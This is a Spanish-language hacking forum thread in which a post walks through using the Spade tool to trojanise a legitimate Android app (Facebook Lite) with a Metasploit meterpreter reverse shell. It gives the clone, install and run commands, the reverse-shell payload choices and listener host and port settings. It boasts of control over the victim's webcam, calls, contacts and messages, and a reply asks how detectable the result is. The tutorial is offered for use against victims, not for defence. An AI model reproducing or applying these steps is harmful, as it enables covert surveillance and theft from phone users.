Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: BrowserNet en Diciembre 04, 2016, 01:50:53 AM

Título: Generando Payload APK persistente con Spade
Publicado por: BrowserNet en Diciembre 04, 2016, 01:50:53 AM
(https://2.bp.blogspot.com/-VouwvUs2zSA/WCebrQo5EbI/AAAAAAAAD7Q/oEilbH1Zv_csXdfOsjLPKSzsG99i-jrRgCLcB/s1600/qrljacking-qr-code-hacking.png)

Saludos nuevamente x10 :v xD, en esta oportunidad les traigo una herramienta salida del horno llamada "SPADE", esta peculiar herramienta esta desarrollada en Python, su objetivo principal es "Compilar" un Payload en apk mediante una conexión "meterpreter" establecida con el Framework "Metasploit".

continuando con el POST, esta herramienta te ahorra el proceso de crear tu payload con extensión .apk en msfvenom o por el mismo metasploit, automatiza todo el proceso, solo debes añadir tu servidor y  tus puertos como normalmente se añaden tanto en un payload como en un Handle.

Descarga:

root@kali:~# git clone https://github.com/suraj-root/spade.git
root@kali:~# cd spade


Luego de descargar y entrar a su carpeta, instalaremos las respectivas librerías para que el software cumpla sus funciones correctamente:

root@kali:~# apt-get install lib32stdc++6 lib32ncurses5 and lib32z1

(https://3.bp.blogspot.com/-jdNQLK8OxII/WCQphTkb1NI/AAAAAAAAD08/D1rBy0C4XyI87TiJ0Uw7UKVbRFuxjGYcACLcB/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-10%2B03-00-16.png)

Una vez completado la instalación de las librerías, deben descargar un aplicativo "APK", donde insertaremos nuestro payload desconpilando el código y procesando la información de la conexión, que haremos desde ese aplicativo infectado creado en spade que se camuflara con el "apk original" en mi caso escogí "Facebook-lite.apk".

(https://3.bp.blogspot.com/-TD2nTSil6PU/WCQrU80dzwI/AAAAAAAAD1M/U8qeFf5E9MQVW0eeQ9kdExoahcP-9VbAwCLcB/s640/1.png)

Luego de copiar nuestro "APK" descargado en la carpeta raíz "spade", entraremos en nuestra terminal y añadiremos lo siguiente:

root@kali:~/spade# ./spade.py facebook-lite.apk

(https://4.bp.blogspot.com/-cvoXS0kWHkM/WCQxa3Unw0I/AAAAAAAAD1g/GllVyS-5UdgBtIuUGEbgCP8qA-C2-TciQCLcB/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-10%2B03-30-48.png)

Como vemos en las 3 primeras lineas, hemos añadido nuestro archivo llamado "Facebook-lite.apk" correctamente, luego nos sale las siguientes 6 opciones:

[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp

Son el tipo de conexión que vamos a establecer para conectarnos desde nuestro servidor en mi caso escogí una session meterpreter reverse_http, la cual indico que estoy trabajando con el protocolo http, en la mayoría de conexión se utiliza el reverse_tcp, pero el resultado sera el mismo.

LHOST> 192.168.1.35    >>>>>>> Nuestra IP
LPORT> 8080                 >>>>>>> Nuestro Puerto de escucha

Luego de establecer nuestra configuración del servidor y el puerto de escucha, automáticamente comenzara el proceso de adicionan de permisos en el administrativos.

(https://4.bp.blogspot.com/-GCrM4JaQHGA/WCQyh0Tt3II/AAAAAAAAD1s/BHRcXMZqyOwyxvXAmcZJnoUEjJjL8oKcgCLcB/s320/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-10%2B03-31-03.png)


cuando me refiero a los permisos administrativos, me refiero que tendremos acceso a establecer todo tipo de servicios del dispositivo, entre ellos "Activar la Webcamp", establecer llamadas, extraer números de contactos, de mensajes, y todo lo demás, es mas se puede decir que tendremos mas privilegios que nuestra victima.

Luego que termine todo el proceso de compilamiento, nos aparece el siguiente mensaje:

Título: Re:Generando Payload APK persistente con Spade
Publicado por: redferne en Diciembre 06, 2016, 02:56:30 AM
Interesante, gracias por la información.
Una pregunta, como está de fud?
Es muy detectado?